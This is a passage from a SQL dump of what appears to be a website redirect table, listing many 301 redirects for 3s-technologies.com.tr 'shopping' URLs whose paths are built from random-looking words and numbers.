00:00:00',301),(77373,'https://3s-technologies.com.tr/tr/shopping/beatup/885443941.html',NULL,'https://3s-technologies.com.tr/shopping/beatup/885443941.html','',1,0,'2026-06-11 09:54:49','0000-00-00 00:00:00',301),(77374,'https://3s-technologies.com.tr/tr/shopping/musefully/79910346.html',NULL,'https://3s-technologies.com.tr/shopping/musefully/79910346.html','',1,0,'2026-06-11 09:54:52','0000-00-00 00:00:00',301),(77375,'https://3s-technologies.com.tr/tr/shopping/complexion/3592523843.html',NULL,'https://3s-technologies.com.tr/shopping/complexion/3592523843.html','',1,0,'2026-06-11 09:54:55','0000-00-00 00:00:00',301),(77376,'https://3s-technologies.com.tr/tr/shopping/deterration/4040313281.html',NULL,'https://3s-technologies.com.tr/shopping/deterration/4040313281.html','',1,0,'2026-06-11 09:54:58','0000-00-00 00:00:00',301),(77377,'https://3s-technologies.com.tr/tr/shopping/cornflower/3206008701.html',NULL,'https://3s-technologies.com.tr/shopping/cornflower/3206008701.html','',1,0,'2026-06-11 09:55:09','0000-00-00 00:00:00',301),(77378,'https://3s-technologies.com.tr/tr/shopping/fossulate/2208931040.html',NULL,'https://3s-technologies.com.tr/shopping/fossulate/2208931040.html','',1,0,'2026-06-11 09:55:13','0000-00-00 00:00:00',301),(77379,'https://3s-technologies.com.tr/tr/shopping/variabilis/1657791600.html',NULL,'https://3s-technologies.com.tr/shopping/variabilis/1657791600.html','',1,0,'2026-06-11 09:55:16','0000-00-00 00:00:00',301),(77380,'https://3s-technologies.com.tr/tr/shopping/classicalness/2976984987.html',NULL,'https://3s-technologies.com.tr/shopping/classicalness/2976984987.html','',1,0,'2026-06-11 09:55:19','0000-00-00 00:00:00',301),(77381,'https://3s-technologies.com.tr/tr/shopping/demonstrable/3277011645.html',NULL,'https://3s-technologies.com.tr/shopping/demonstrable/3277011645.html','',1,0,'2026-06-11 09:55:23','0000-00-00 00:00:00',301),(77382,'https://3s-technologies.com.tr/tr/shopping/winter/1380545447.html',NULL,'https://3s-technologies.com.tr/shopping/winter/1380545447.html','',1,0,'2026-06-11 09:55:31','0000-00-00 00:00:00',301),(77383,'https://3s-technologies.com.tr/tr/shopping/thecodontia/321805941.html',NULL,'https://3s-technologies.com.tr/shopping/thecodontia/321805941.html','',1,0,'2026-06-11 09:55:33','0000-00-00 00:00:00',301),(77384,'https://3s-technologies.com.tr/tr/shopping/congregational/2083700544.html',NULL,'https://3s-technologies.com.tr/shopping/congregational/2083700544.html','',1,0,'2026-06-11 09:55:36','0000-00-00 00:00:00',301),(77385,'https://3s-technologies.com.tr/tr/shopping/spank/391562633.html',NULL,'https://3s-technologies.com.tr/shopping/spank/391562633.html','',1,0,'2026-06-11 09:55:39','0000-00-00 00:00:00',301),(77386,'https://3s-technologies.com.tr/tr/shopping/presbyte/773246009.html',NULL,'https://3s-technologies.com.tr/shopping/presbyte/773246009.html','',1,0,'2026-06-11 09:55:42','0000-00-00 00:00:00',301),(77387,'https://3s-technologies.com.tr/tr/shopping/crossbuttock/2988539154.html',NULL,'https://3s-technologies.com.tr/shopping/crossbuttock/2988539154.html','',1,0,'2026-06-11 09:55:45','0000-00-00 00:00:00',301),(77388,'https://3s-technologies.com.tr/tr/shopping/incompatible/59748876.html',NULL,'https://3s-technologies.com.tr/shopping/incompatible/59748876.html','',1,0,'2026-06-11 09:55:48','0000-00-00 00:00:00',301),(77389,'https://3s-technologies.com.tr/tr/shopping/embrangle/1980952280.html',NULL,'https://3s-technologies.com.tr/shopping/embrangle/1980952280.html','',1,0,'2026-06-11 09:55:51','0000-00-00 00:00:00',301),(77390,'https://3s-technologies.com.tr/tr/shopping/buffoonly/741610807.html',NULL,'https://3s-technologies.com.tr/shopping/buffoonly/741610807.html','',1,0,'2026-06-11 09:55:54','0000-00-00 00:00:00',301),(77391,'https://3s-technologies.com.tr/tr/shopping/fathomless/2604956079.html',NULL,'https://3s-technologies.com.tr/shopping/fathomless/2604956079.html','',1,0,'2026-06-11 09:55:57','0000-00-00 00:00:00',301),(77392,'https://3s-technologies.com.tr/tr/shopping/exaration/2828945086.html',NULL,'https://3s-technologies.com.tr/shopping/exaration/2828945086.html','',1,0,'2026-06-11 09:56:00','0000-00-00 00:00:00',301),(77393,'https://3s-technologies.com.tr/tr/shopping/cantering/2204342252.html',NULL,'https://3s-technologies.com.tr/shopping/cantering/2204342252.html','',1,0,'2026-06-11 09:56:03','0000-00-00 00:00:00',301),(77394,'https://3s-technologies.com.tr/tr/shopping/chasable/760401590.html',NULL,'https://3s-technologies.com.tr/shopping/chasable/760401590.html','',1,0,'2026-06-11 09:56:09','0000-00-00 00:00:00',301),(77395,'https://3s-technologies.com.tr/tr/shopping/allotropically/1803381676.html',NULL,'https://3s-technologies.com.tr/shopping/allotropically/1803381676.html','',1,0,'2026-06-11 09:56:16','0000-00-00 00:00:00',301),(77396,'https://3s-technologies.com.tr/tr/shopping/slanting/1912281072.html',NULL,'https://3s-technologies.com.tr/shopping/slanting/1912281072.html','',1,0,'2026-06-11 09:56:18','0000-00-00 00:00:00',301),(77397,'https://3s-technologies.com.tr/tr/shopping/violous/2803373447.html',NULL,'https://3s-technologies.com.tr/shopping/violous/2803373447.html','',1,0,'2026-06-11 09:56:21','0000-00-00 00:00:00',301),(77398,'https://3s-technologies.com.tr/tr/shopping/rocaille/3933716355.html',NULL,'https://3s-technologies.com.tr/shopping/rocaille/3933716355.html','',1,0,'2026-06-11 09:56:24','0000-00-00 00:00:00',301),(77399,'https://3s-technologies.com.tr/tr/shopping/gadder/525465581.html',NULL,'https://3s-technologies.com.tr/shopping/gadder/525465581.html','',1,0,'2026-06-11 09:56:27','0000-00-00 00:00:00',301),(77400,'https://3s-technologies.com.tr/tr/shopping/increased/2468888557.html',NULL,'https://3s-technologies.com.tr/shopping/increased/2468888557.html','',1,0,'2026-06-11 09:56:30','0000-00-00 00:00:00',301),(77401,'https://3s-technologies.com.tr/tr/shopping/plugger/3238602721.html',NULL,'https://3s-technologies.com.tr/shopping/plugger/3238602721.html','',1,0,'2026-06-11 09:56:33','0000-00-00 00:00:00',301),(77402,'https://3s-technologies.com.tr/tr/shopping/understroke/2477017541.html',NULL,'https://3s-technologies.com.tr/shopping/understroke/2477017541.html','',1,0,'2026-06-11 09:56:37','0000-00-00 00:00:00',301),(77403,'https://3s-technologies.com.tr/tr/shopping/overween/1837179253.html',NULL,'https://3s-technologies.com.tr/shopping/overween/1837179253.html','',1,0,'2026-06-11 09:56:39','0000-00-00 00:00:00',301),(77404,'https://3s-technologies.com.tr/tr/shopping/misorderly/3582490241.html',NULL,'https://3s-technologies.com.tr/shopping/misorderly/3582490241.html','',1,0,'2026-06-11 09:56:42','0000-00-00 00:00:00',301),(77405,'https://3s-technologies.com.tr/tr/shopping/maize/3336389377.html',NULL,'https://3s-technologies.com.tr/shopping/maize/3336389377.html','',1,0,'2026-06-11 09:56:45','0000-00-00 00:00:00',301),(77406,'https://3s-technologies.com.tr/tr/shopping/problematical/3076170480.html',NULL,'https://3s-technologies.com.tr/shopping/problematical/3076170480.html','',1,0,'2026-06-11 09:56:48','0000-00-00 00:00:00',301),(77407,'https://3s-technologies.com.tr/tr/shopping/touchbox/1178795390.html',NULL,'https://3s-technologies.com.tr/shopping/touchbox/1178795390.html','',1,0,'2026-06-11 09:56:52','0000-00-00 00:00:00',301),(77408,'https://3s-technologies.com.tr/tr/shopping/oolong/1918034352.html',NULL,'https://3s-technologies.com.tr/shopping/oolong/1918034352.html','',1,0,'2026-06-11 09:56:55','0000-00-00 00:00:00',301),(77409,'https://3s-technologies.com.tr/tr/shopping/tyfoon/3706580085.html',NULL,'https://3s-technologies.com.tr/shopping/tyfoon/3706580085.html','',1,0,'2026-06-11 09:56:58','0000-00-00 00:00:00',301),(77410,'https://3s-technologies.com.tr/tr/shopping/pacate/31368651.html',NULL,'https://3s-technologies.com.tr/shopping/pacate/31368651.html','',1,0,'2026-06-11 09:57:01','0000-00-00 00:00:00',301),(77411,'https://3s-technologies.com.tr/tr/shopping/sperable/3161568593.html',NULL,'https://3s-technologies.com.tr/shopping/sperable/3161568593.html','',1,0,'2026-06-11 09:57:04','0000-00-00 00:00:00',301),(77412,'https://3s-technologies.com.tr/tr/shopping/catched/3312883159.html',NULL,'https://3s-technologies.com.tr/shopping/catched/3312883159.html','',1,0,'2026-06-11 09:57:07','0000-00-00 00:00:00',301),(77413,'https://3s-technologies.com.tr/tr/shopping/unimportant/453206522.html',NULL,'https://3s-technologies.com.tr/shopping/unimportant/453206522.html','',1,0,'2026-06-11 09:57:10','0000-00-00 00:00:00',301),(77414,'https://3s-technologies.com.tr/tr/shopping/calculus/3163655014.html',NULL,'https://3s-technologies.com.tr/shopping/calculus/3163655014.html','',1,0,'2026-06-11 09:57:13','0000-00-00 00:00:00',301),(77415,'https://3s-technologies.com.tr/tr/shopping/aculeous/2328050776.html',NULL,'https://3s-technologies.com.tr/shopping/aculeous/2328050776.html','',1,0,'2026-06-11 09:57:16','0000-00-00 00:00:00',301),(77416,'https://3s-technologies.com.tr/tr/shopping/cubeb/3754438693.html',NULL,'https://3s-technologies.com.tr/shopping/cubeb/3754438693.html','',1,0,'2026-06-11 09:57:19','0000-00-00 00:00:00',301),(77417,'https://3s-technologies.com.tr/tr/shopping/implexion/3768443112.html',NULL,'https://3s-technologies.com.tr/shopping/implexion/3768443112.html','',1,0,'2026-06-11 09:57:22','0000-00-00 00:00:00',301),(77418,'https://3s-technologies.com.tr/tr/shopping/wareless/2308489321.html',NULL,'https://3s-technologies.com.tr/shopping/wareless/2308489321.html','',1,0,'2026-06-11 09:57:25','0000-00-00 00:00:00',301),(77419,'https://3s-technologies.com.tr/tr/shopping/microdont/3279314115.html',NULL,'https://3s-technologies.com.tr/shopping/microdont/3279314115.html','',1,0,'2026-06-11 09:57:32','0000-00-00 00:00:00',301),(77420,'https://3s-technologies.com.tr/tr/shopping/ventriloquizing/3133706083.html',NULL,'https://3s-technologies.com.tr/shopping/ventriloquizing/3133706083.html','',1,0,'2026-06-11 09:57:34','0000-00-00 00:00:00',301),(77421,'https://3s-technologies.com.tr/tr/shopping/forebrain/3722881660.html',NULL,'https://3s-technologies.com.tr/shopping/forebrain/3722881660.html','',1,0,'2026-06-11 09:57:37','0000-00-00 00:00:00',301),(77422,'https://3s-technologies.com.tr/tr/shopping/extolment/3964697694.html',NULL,'https://3s-technologies.com.tr/shopping/extolment/3964697694.html','',1,0,'2026-06-11 09:57:41','0000-00-00 00:00:00',301),(77423,'https://3s-technologies.com.tr/tr/shopping/rigor/2942552783.html',NULL,'https://3s-technologies.com.tr/shopping/rigor/2942552783.html','',1,0,'2026-06-11 09:57:43','0000-00-00 00:00:00',301),(77424,'https://3s-technologies.com.tr/tr/shopping/refutatory/3191684994.html',NULL,'https://3s-technologies.com.tr/shopping/refutatory/3191684994.html','',1,0,'2026-06-11 09:57:47','0000-00-00 00:00:00',301),(77425,'https://3s-technologies.com.tr/tr/shopping/shindle/1270645082.html',NULL,'https://3s-technologies.com.tr/shopping/shindle/1270645082.html','',1,0,'2026-06-11 09:57:49','0000-00-00 00:00:00',301),(77426,'https://3s-technologies.com.tr/tr/shopping/annulation/1341735601.html',NULL,'https://3s-technologies.com.tr/shopping/annulation/1341735601.html','',1,0,'2026-06-11 09:57:52','0000-00-00 00:00:00',301),(77427,'https://3s-technologies.com.tr/tr/shopping/digit/2117803503.html',NULL,'https://3s-technologies.com.tr/shopping/digit/2117803503.html','',1,0,'2026-06-11 09:57:55','0000-00-00 00:00:00',301),(77428,'https://3s-technologies.com.tr/tr/shopping/speedier/2004266825.html',NULL,'https://3s-technologies.com.tr/shopping/speedier/2004266825.html','',1,0,'2026-06-11 09:57:58','0000-00-00 00:00:00',301),(77429,'https://3s-technologies.com.tr/tr/shopping/cephalometer/2365256117.html',NULL,'https://3s-technologies.com.tr/shopping/cephalometer/2365256117.html','',1,0,'2026-06-11 09:58:02','0000-00-00 00:00:00',301),(77430,'https://3s-technologies.com.tr/tr/shopping/outmount/1978782771.html',NULL,'https://3s-technologies.com.tr/shopping/outmount/1978782771.html','',1,0,'2026-06-11 09:58:04','0000-00-00 00:00:00',301),(77431,'https://3s-technologies.com.tr/tr/shopping/monstrousness/728166357.html',NULL,'https://3s-technologies.com.tr/shopping/monstrousness/728166357.html','',1,0,'2026-06-11 09:58:10','0000-00-00 00:00:00',301),(77432,'https://3s-technologies.com.tr/tr/shopping/rejectable/4258873215.html',NULL,'https://3s-technologies.com.tr/shopping/rejectable/4258873215.html','',1,0,'2026-06-11 09:58:13','0000-00-00 00:00:00',301),(77433,'https://3s-technologies.com.tr/tr/shopping/noninstitutionalized/1677005498.html',NULL,'https://3s-technologies.com.tr/shopping/noninstitutionalized/1677005498.html','',1,0,'2026-06-11 09:58:16','0000-00-00 00:00:00',301),(77434,'https://3s-technologies.com.tr/tr/shopping/instigator/2947019843.html',NULL,'https://3s-technologies.com.tr/shopping/instigator/2947019843.html','',1,0,'2026-06-11 09:58:19','0000-00-00 00:00:00',301),(77435,'https://3s-technologies.com.tr/tr/shopping/synchronistic/2406154265.html',NULL,'https://3s-technologies.com.tr/shopping/synchronistic/2406154265.html','',1,0,'2026-06-11 09:58:22','0000-00-00 00:00:00',301),(77436,'https://3s-technologies.com.tr/tr/shopping/sermonizer/535940626.html',NULL,'https://3s-technologies.com.tr/shopping/sermonizer/535940626.html','',1,0,'2026-06-11 09:58:25','0000-00-00 00:00:00',301),(77437,'https://3s-technologies.com.tr/tr/shopping/diesinking/3204796586.html',NULL,'https://3s-technologies.com.tr/shopping/diesinking/3204796586.html','',1,0,'2026-06-11 09:58:28','0000-00-00 00:00:00',301),(77438,'https://3s-technologies.com.tr/tr/shopping/entracte/314792971.html',NULL,'https://3s-technologies.com.tr/shopping/entracte/314792971.html','',1,0,'2026-06-11 09:58:31','0000-00-00 00:00:00',301),(77439,'https://3s-technologies.com.tr/tr/shopping/disrange/1262394386.html',NULL,'https://3s-technologies.com.tr/shopping/disrange/1262394386.html','',1,0,'2026-06-11 09:58:34','0000-00-00 00:00:00',301),(77440,'https://3s-technologies.com.tr/tr/shopping/fertility/1113712840.html',NULL,'https://3s-technologies.com.tr/shopping/fertility/1113712840.html','',1,0,'2026-06-11 09:58:37','0000-00-00 00:00:00',301),(77441,'https://3s-technologies.com.tr/tr/shopping/waker/2517388441.html',NULL,'https://3s-technologies.com.tr/shopping/waker/2517388441.html','',1,0,'2026-06-11 09:58:40','0000-00-00 00:00:00',301),(77442,'https://3s-technologies.com.tr/tr/shopping/sledge/1148250575.html',NULL,'https://3s-technologies.com.tr/shopping/sledge/1148250575.html','',1,0,'2026-06-11 09:58:43','0000-00-00 00:00:00',301),(77443,'https://3s-technologies.com.tr/tr/shopping/closing/2726010084.html',NULL,'https://3s-technologies.com.tr/shopping/closing/2726010084.html','',1,0,'2026-06-11 09:58:47','0000-00-00 00:00:00',301),(77444,'https://3s-technologies.com.tr/tr/shopping/moroccan/3045487753.html',NULL,'https://3s-technologies.com.tr/shopping/moroccan/3045487753.html','',1,0,'2026-06-11 09:58:50','0000-00-00 00:00:00',301),(77445,'https://3s-technologies.com.tr/tr/shopping/equilibrium/3305706650.html',NULL,'https://3s-technologies.com.tr/shopping/equilibrium/3305706650.html','',1,0,'2026-06-11 09:58:53','0000-00-00 00:00:00',301),(77446,'https://3s-technologies.com.tr/tr/shopping/proteids/1366826706.html',NULL,'https://3s-technologies.com.tr/shopping/proteids/1366826706.html','',1,0,'2026-06-11 09:58:56','0000-00-00 00:00:00',301),(77447,'https://3s-technologies.com.tr/tr/shopping/adventual/3774529250.html',NULL,'https://3s-technologies.com.tr/shopping/adventual/3774529250.html','',1,0,'2026-06-11 09:58:59','0000-00-00 00:00:00',301),(77448,'https://3s-technologies.com.tr/tr/shopping/haliotis/541678133.html',NULL,'https://3s-technologies.com.tr/shopping/haliotis/541678133.html','',1,0,'2026-06-11 09:59:02','0000-00-00 00:00:00',301),(77449,'https://3s-technologies.com.tr/tr/shopping/panoply/321969464.html',NULL,'https://3s-technologies.com.tr/shopping/panoply/321969464.html','',1,0,'2026-06-11 09:59:05','0000-00-00 00:00:00',301),(77450,'https://3s-technologies.com.tr/tr/shopping/hydrophasianus/1101995166.html',NULL,'https://3s-technologies.com.tr/shopping/hydrophasianus/1101995166.html','',1,0,'2026-06-11 09:59:08','0000-00-00 00:00:00',301),(77451,'https://3s-technologies.com.tr/tr/shopping/fisticuff/3826284127.html',NULL,'https://3s-technologies.com.tr/shopping/fisticuff/3826284127.html','',1,0,'2026-06-11 09:59:11','0000-00-00 00:00:00',301),(77452,'https://3s-technologies.com.tr/tr/shopping/prighte/3274847055.html',NULL,'https://3s-technologies.com.tr/shopping/prighte/3274847055.html','',1,0,'2026-06-11 09:59:14','0000-00-00 00:00:00',301),(77453,'https://3s-technologies.com.tr/tr/shopping/viameter/2919840452.html',NULL,'https://3s-technologies.com.tr/shopping/viameter/2919840452.html','',1,0,'2026-06-11 09:59:17','0000-00-00 00:00:00',301),(77454,'https://3s-technologies.com.tr/tr/shopping/orthodiagonal/1952572055.html',NULL,'https://3s-technologies.com.tr/shopping/orthodiagonal/1952572055.html','',1,0,'2026-06-11 09:59:24','0000-00-00 00:00:00',301),(77455,'https://3s-technologies.com.tr/tr/shopping/backbencher/659752906.html',NULL,'https://3s-technologies.com.tr/shopping/backbencher/659752906.html','',1,0,'2026-06-11 09:59:26','0000-00-00 00:00:00',301),(77456,'https://3s-technologies.com.tr/tr/shopping/congestive/4153635743.html',NULL,'https://3s-technologies.com.tr/shopping/congestive/4153635743.html','',1,0,'2026-06-11 09:59:29','0000-00-00 00:00:00',301),(77457,'https://3s-technologies.com.tr/tr/shopping/replacement/3331800589.html',NULL,'https://3s-technologies.com.tr/shopping/replacement/3331800589.html','',1,0,'2026-06-11 09:59:33','0000-00-00 00:00:00',301),(77458,'https://3s-technologies.com.tr/tr/shopping/biscacha/1074857586.html',NULL,'https://3s-technologies.com.tr/shopping/biscacha/1074857586.html','',1,0,'2026-06-11 09:59:35','0000-00-00 00:00:00',301),(77459,'https://3s-technologies.com.tr/tr/shopping/whiled/733967260.html',NULL,'https://3s-technologies.com.tr/shopping/whiled/733967260.html','',1,0,'2026-06-11 09:59:38','0000-00-00 00:00:00',301),(77460,'https://3s-technologies.com.tr/tr/shopping/ghastfully/1887404151.html',NULL,'https://3s-technologies.com.tr/shopping/ghastfully/1887404151.html','',1,0,'2026-06-11 09:59:41','0000-00-00 00:00:00',301),(77461,'https://3s-technologies.com.tr/tr/shopping/coolen/2285914902.html',NULL,'https://3s-technologies.com.tr/shopping/coolen/2285914902.html','',1,0,'2026-06-11 09:59:44','0000-00-00 00:00:00',301),(77462,'https://3s-technologies.com.tr/tr/shopping/early/387095557.html',NULL,'https://3s-technologies.com.tr/shopping/early/387095557.html','',1,0,'2026-06-11 09:59:47','0000-00-00 00:00:00',301),(77463,'https://3s-technologies.com.tr/tr/shopping/namable/3303420364.html',NULL,'https://3s-technologies.com.tr/shopping/namable/3303420364.html','',1,0,'2026-06-11 09:59:50','0000-00-00 00:00:00',301),(77464,'https://3s-technologies.com.tr/tr/shopping/molossus/1880105930.html',NULL,'https://3s-technologies.com.tr/shopping/molossus/1880105930.html','',1,0,'2026-06-11 09:59:53','0000-00-00 00:00:00',301),(77465,'https://3s-technologies.com.tr/tr/shopping/algidness/2525517457.html',NULL,'https://3s-technologies.com.tr/shopping/algidness/2525517457.html','',1,0,'2026-06-11 09:59:56','0000-00-00 00:00:00',301),(77466,'https://3s-technologies.com.tr/tr/shopping/transpiring/282348441.html',NULL,'https://3s-technologies.com.tr/shopping/transpiring/282348441.html','',1,0,'2026-06-11 10:00:01','0000-00-00 00:00:00',301),(77467,'https://3s-technologies.com.tr/tr/shopping/arnotto/699986013.html',NULL,'https://3s-technologies.com.tr/shopping/arnotto/699986013.html','',1,0,'2026-06-11 10:00:06','0000-00-00 00:00:00',301),(77468,'https://3s-technologies.com.tr/tr/shopping/royally/540682083.html',NULL,'https://3s-technologies.com.tr/shopping/royally/540682083.html','',1,0,'2026-06-11 10:00:09','0000-00-00 00:00:00',301),(77469,'https://3s-technologies.com.tr/tr/shopping/charitably/3296581616.html',NULL,'https://3s-technologies.com.tr/shopping/charitably/3296581616.html','',1,0,'2026-06-11 10:00:12','0000-00-00 00:00:00',301),(77470,'https://3s-technologies.com.tr/tr/shopping/lengthier/2722495515.html',NULL,'https://3s-technologies.com.tr/shopping/lengthier/2722495515.html','',1,0,'2026-06-11 10:00:15','0000-00-00 00:00:00',301),(77471,'https://3s-technologies.com.tr/tr/shopping/fellowfeeling/1164913094.html',NULL,'https://3s-technologies.com.tr/shopping/fellowfeeling/1164913094.html','',1,0,'2026-06-11 10:00:18','0000-00-00 00:00:00',301),(77472,'https://3s-technologies.com.tr/tr/shopping/manipular/416775450.html',NULL,'https://3s-technologies.com.tr/shopping/manipular/416775450.html','',1,0,'2026-06-11 10:00:21','0000-00-00 00:00:00',301),(77473,'https://3s-technologies.com.tr/tr/shopping/matchlock/2752280923.html',NULL,'https://3s-technologies.com.tr/shopping/matchlock/2752280923.html','',1,0,'2026-06-11 10:00:24','0000-00-00 00:00:00',301),(77474,'https://3s-technologies.com.tr/tr/shopping/persuasory/1939817391.html',NULL,'https://3s-technologies.com.tr/shopping/persuasory/1939817391.html','',1,0,'2026-06-11 10:00:29','0000-00-00 00:00:00',301),(77475,'https://3s-technologies.com.tr/tr/shopping/zizith/1574352924.html',NULL,'https://3s-technologies.com.tr/shopping/zizith/1574352924.html','',1,0,'2026-06-11 10:00:31','0000-00-00 00:00:00',301),(77476,'https://3s-technologies.com.tr/tr/shopping/guardant/4102509015.html',NULL,'https://3s-technologies.com.tr/shopping/guardant/4102509015.html','',1,0,'2026-06-11 10:00:34','0000-00-00 00:00:00',301),(77477,'https://3s-technologies.com.tr/tr/shopping/pharmacologist/3988972369.html',NULL,'https://3s-technologies.com.tr/shopping/pharmacologist/3988972369.html','',1,0,'2026-06-11 10:00:37','0000-00-00 00:00:00',301),(77478,'https://3s-technologies.com.tr/tr/shopping/damianist/2941787014.html',NULL,'https://3s-technologies.com.tr/shopping/damianist/2941787014.html','',1,0,'2026-06-11 10:00:40','0000-00-00 00:00:00',301),(77479,'https://3s-technologies.com.tr/tr/shopping/giddier/2659788566.html',NULL,'https://3s-technologies.com.tr/shopping/giddier/2659788566.html','',1,0,'2026-06-11 10:00:43','0000-00-00 00:00:00',301),(77480,'https://3s-technologies.com.tr/tr/shopping/ctenoidean/2523962736.html',NULL,'https://3s-technologies.com.tr/shopping/ctenoidean/2523962736.html','',1,0,'2026-06-11 10:00:46','0000-00-00 00:00:00',301),(77481,'https://3s-technologies.com.tr/tr/shopping/ytterbium/531919880.html',NULL,'https://3s-technologies.com.tr/shopping/ytterbium/531919880.html','',1,0,'2026-06-11 10:00:49','0000-00-00 00:00:00',301),(77482,'https://3s-technologies.com.tr/tr/shopping/stamineum/612262507.html',NULL,'https://3s-technologies.com.tr/shopping/stamineum/612262507.html','',1,0,'2026-06-11 10:00:52','0000-00-00 00:00:00',301),(77483,'https://3s-technologies.com.tr/tr/shopping/inaugur/507042991.html',NULL,'https://3s-technologies.com.tr/shopping/inaugur/507042991.html','',1,0,'2026-06-11 10:00:55','0000-00-00 00:00:00',301),(77484,'https://3s-technologies.com.tr/tr/shopping/idorgan/722933528.html',NULL,'https://3s-technologies.com.tr/shopping/idorgan/722933528.html','',1,0,'2026-06-11 10:00:58','0000-00-00 00:00:00',301),(77485,'https://3s-technologies.com.tr/tr/shopping/uranographical/4278171949.html',NULL,'https://3s-technologies.com.tr/shopping/uranographical/4278171949.html','',1,0,'2026-06-11 10:01:01','0000-00-00 00:00:00',301),(77486,'https://3s-technologies.com.tr/tr/shopping/solvend/785319334.html',NULL,'https://3s-technologies.com.tr/shopping/solvend/785319334.html','',1,0,'2026-06-11 10:01:06','0000-00-00 00:00:00',301),(77487,'https://3s-technologies.com.tr/tr/shopping/lightly/4044136316.html',NULL,'https://3s-technologies.com.tr/shopping/lightly/4044136316.html','',1,0,'2026-06-11 10:01:09','0000-00-00 00:00:00',301),(77488,'https://3s-technologies.com.tr/tr/shopping/tryptic/3487684255.html',NULL,'https://3s-technologies.com.tr/shopping/tryptic/3487684255.html','',1,0,'2026-06-11 10:01:12','0000-00-00 00:00:00',301),(77489,'https://3s-technologies.com.tr/tr/shopping/limule/2546732422.html',NULL,'https://3s-technologies.com.tr/shopping/limule/2546732422.html','',1,0,'2026-06-11 10:01:15','0000-00-00 00:00:00',301),(77490,'https://3s-technologies.com.tr/tr/shopping/wifely/1396158504.html',NULL,'https://3s-technologies.com.tr/shopping/wifely/1396158504.html','',1,0,'2026-06-11 10:01:21','0000-00-00 00:00:00',301),(77491,'https://3s-technologies.com.tr/tr/shopping/wurraluh/1428393737.html',NULL,'https://3s-technologies.com.tr/shopping/wurraluh/1428393737.html','',1,0,'2026-06-11 10:01:23','0000-00-00 00:00:00',301),(77492,'https://3s-technologies.com.tr/tr/shopping/caballero/3826755198.html',NULL,'https://3s-technologies.com.tr/shopping/caballero/3826755198.html','',1,0,'2026-06-11 10:01:26','0000-00-00 00:00:00',301),(77493,'https://3s-technologies.com.tr/tr/shopping/bintourong/3780541600.html',NULL,'https://3s-technologies.com.tr/shopping/bintourong/3780541600.html','',1,0,'2026-06-11 10:01:29','0000-00-00 00:00:00',301),(77494,'https://3s-technologies.com.tr/tr/shopping/ridiculousness/287590673.html',NULL,'https://3s-technologies.com.tr/shopping/ridiculousness/287590673.html','',1,0,'2026-06-11 10:01:32','0000-00-00 00:00:00',301),(77495,'https://3s-technologies.com.tr/tr/shopping/disordeined/2178092445.html',NULL,'https://3s-technologies.com.tr/shopping/disordeined/2178092445.html','',1,0,'2026-06-11 10:01:36','0000-00-00 00:00:00',301),(77496,'https://3s-technologies.com.tr/tr/shopping/sivatherium/527167585.html',NULL,'https://3s-technologies.com.tr/shopping/sivatherium/527167585.html','',1,0,'2026-06-11 10:01:38','0000-00-00 00:00:00',301),(77497,'https://3s-technologies.com.tr/tr/shopping/descanter/1918480682.html',NULL,'https://3s-technologies.com.tr/shopping/descanter/1918480682.html','',1,0,'2026-06-11 10:01:41','0000-00-00 00:00:00',301),(77498,'https://3s-technologies.com.tr/tr/shopping/calyceraceae/590320864.html',NULL,'https://3s-technologies.com.tr/shopping/calyceraceae/590320864.html','',1,0,'2026-06-11 10:01:44','0000-00-00 00:00:00',301),(77499,'https://3s-technologies.com.tr/tr/shopping/hirer/3810194553.html',NULL,'https://3s-technologies.com.tr/shopping/hirer/3810194553.html','',1,0,'2026-06-11 10:01:47','0000-00-00 00:00:00',301),(77500,'https://3s-technologies.com.tr/tr/shopping/nonvascular/3714150430.html',NULL,'https://3s-technologies.com.tr/shopping/nonvascular/3714150430.html','',1,0,'2026-06-11 10:01:50','0000-00-00 00:00:00',301),(77501,'https://3s-technologies.com.tr/tr/shopping/buckshot/2324030062.html',NULL,'https://3s-technologies.com.tr/shopping/buckshot/2324030062.html','',1,0,'2026-06-11 10:01:53','0000-00-00 00:00:00',301),(77502,'https://3s-technologies.com.tr/tr/shopping/dephlegm/2197242994.html',NULL,'https://3s-technologies.com.tr/shopping/dephlegm/2197242994.html','',1,0,'2026-06-11 10:01:58','0000-00-00 00:00:00',301),(77503,'https://3s-technologies.com.tr/tr/shopping/deafmuteness/1789269416.html',NULL,'https://3s-technologies.com.tr/shopping/deafmuteness/1789269416.html','',1,0,'2026-06-11 10:02:00','0000-00-00 00:00:00',301),(77504,'https://3s-technologies.com.tr/tr/shopping/housemaid/2057477661.html',NULL,'https://3s-technologies.com.tr/shopping/housemaid/2057477661.html','',1,0,'2026-06-11 10:02:03','0000-00-00 00:00:00',301),(77505,'https://3s-technologies.com.tr/tr/shopping/narcosis/3109880474.html',NULL,'https://3s-technologies.com.tr/shopping/narcosis/3109880474.html','',1,0,'2026-06-11 10:02:10','0000-00-00 00:00:00',301),(77506,'https://3s-technologies.com.tr/tr/shopping/bolivian/2963501430.html',NULL,'https://3s-technologies.com.tr/shopping/bolivian/2963501430.html','',1,0,'2026-06-11 10:02:13','0000-00-00 00:00:00',301),(77507,'https://3s-technologies.com.tr/tr/shopping/bagasse/2374225283.html',NULL,'https://3s-technologies.com.tr/shopping/bagasse/2374225283.html','',1,0,'2026-06-11 10:02:16','0000-00-00 00:00:00',301),(77508,'https://3s-technologies.com.tr/tr/shopping/cookstove/2899555071.html',NULL,'https://3s-technologies.com.tr/shopping/cookstove/2899555071.html','',1,0,'2026-06-11 10:02:18','0000-00-00 00:00:00',301),(77509,'https://3s-technologies.com.tr/tr/shopping/grammatophyllum/3909752866.html',NULL,'https://3s-technologies.com.tr/shopping/grammatophyllum/3909752866.html','',1,0,'2026-06-11 10:02:21','0000-00-00 00:00:00',301),(77510,'https://3s-technologies.com.tr/tr/shopping/arnicine/3415871542.html',NULL,'https://3s-technologies.com.tr/shopping/arnicine/3415871542.html','',1,0,'2026-06-11 10:02:24','0000-00-00 00:00:00',301),(77511,'https://3s-technologies.com.tr/tr/shopping/spiciferous/837633811.html',NULL,'https://3s-technologies.com.tr/shopping/spiciferous/837633811.html','',1,0,'2026-06-11 10:02:28','0000-00-00 00:00:00',301),(77512,'https://3s-technologies.com.tr/tr/shopping/smitt/1139036107.html',NULL,'https://3s-technologies.com.tr/shopping/smitt/1139036107.html','',1,0,'2026-06-11 10:02:30','0000-00-00 00:00:00',301),(77513,'https://3s-technologies.com.tr/tr/shopping/giftedness/2538122904.html',NULL,'https://3s-technologies.com.tr/shopping/giftedness/2538122904.html','',1,0,'2026-06-11 10:02:33','0000-00-00 